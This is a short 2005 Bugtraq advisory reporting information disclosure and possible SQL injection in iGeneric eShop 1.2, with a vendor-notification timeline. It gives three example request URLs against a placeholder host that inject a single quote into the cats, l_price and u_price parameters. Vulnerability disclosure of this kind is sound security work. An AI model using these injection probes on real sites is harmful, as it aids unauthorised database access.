
Date: Mon, 21 Feb 2005 20:45:17 -0000
From: "John Cobb" <johnc@...ytes.com>
To: <bugtraq@...urityfocus.com>
Subject: [NOBYTES.COM: #5] iGeneric eShop 1.2 - Information Disclosure & Possible SQL Injection


 
Hello All,

I have discovered multiple vulnerabilities in: iGeneric eShop 1.2

Authors Site: http://www.igeneric.co.uk

+-[Examples:]--------------------------------------------------+

Information Disclosure & Possible SQL Injection:

http://www.victimsite.com/page.php?page_type=catalog_products&type_id[]=2&SE
SSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type=catalog_products&cats='

http://www.victimsite.com/page.php?page_type=catalog_products&type_id[]=2&SE
SSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type3=catalog_products&search
=1&l_price='&u_price=1&Submit=Search

http://www.victimsite.com/page.php?page_type=catalog_products&type_id[]=2&SE
SSION_ID=304ba47f3ea48f0d6e1acdd6480c2c9c&page_type3=catalog_products&search
=1&l_price=1&u_price='&Submit=Search


+-[Notes:]-----------------------------------------------------+

Vulnerabilities found on: 10/02/2005
Author(s) Informed on: 14/02/2005
Author(s) Response: None As Of Yet
Author(s) Fix: None As Of Yet


Regards

John Cobb

JohnC@...ytes.com

http://www.nobytes.com





